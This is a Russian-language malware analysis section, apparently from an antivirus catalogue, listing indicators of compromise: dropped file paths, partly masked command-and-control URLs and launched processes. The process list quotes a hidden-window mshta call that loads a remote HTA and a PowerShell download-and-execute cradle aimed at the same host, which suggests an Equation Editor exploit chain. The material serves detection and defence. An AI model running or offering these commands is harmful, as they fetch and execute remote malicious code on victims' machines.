Техническая информация
- '%WINDIR%\syswow64\mshta.exe' http://18#.##1.209.47:1010/hta &AAAAAAC
- C:\users\public\tczr.exe
- %TEMP%\nsd1ec2.tmp
- %TEMP%\nsd1ec3.tmp\userinfo.dll
- %APPDATA%\des\k\sticky\yourname\comjepost.cpp
- %APPDATA%\des\k\sticky\yourname\vsaenv.exe
- %APPDATA%\des\k\sticky\yourname\dvfxdochelpb.hxk
- %APPDATA%\des\k\sticky\yourname\writepersistentnets390xvirtio
- %APPDATA%\des\k\sticky\yourname\netcfv2customcontrol.zip
- %APPDATA%\des\k\sticky\yourname\extcon-sm5502.ko
- %APPDATA%\des\k\sticky\yourname\sysinfo.hxc
- %APPDATA%\des\k\sticky\yourname\70.opends60.dll
- %APPDATA%\des\k\sticky\yourname\$onxml
- %APPDATA%\des\k\sticky\yourname\manifest.xml
- %TEMP%\commenttext\if\xrds\local68235603genericscrewdriver.gif
- %TEMP%\commenttext\if\xrds\model120.xml
- %TEMP%\commenttext\if\xrds\refreshd.gif
- http://18#.##1.209.47:1010/hta via 18#.#61.209.47
- http://18#.##1.209.47:1010/get via 18#.#61.209.47
- 'C:\users\public\tczr.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://18#....' (со скрытым окном)
- '%WINDIR%\syswow64\mshta.exe' http://18#.##1.209.47:1010/hta &AAAAAAC' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding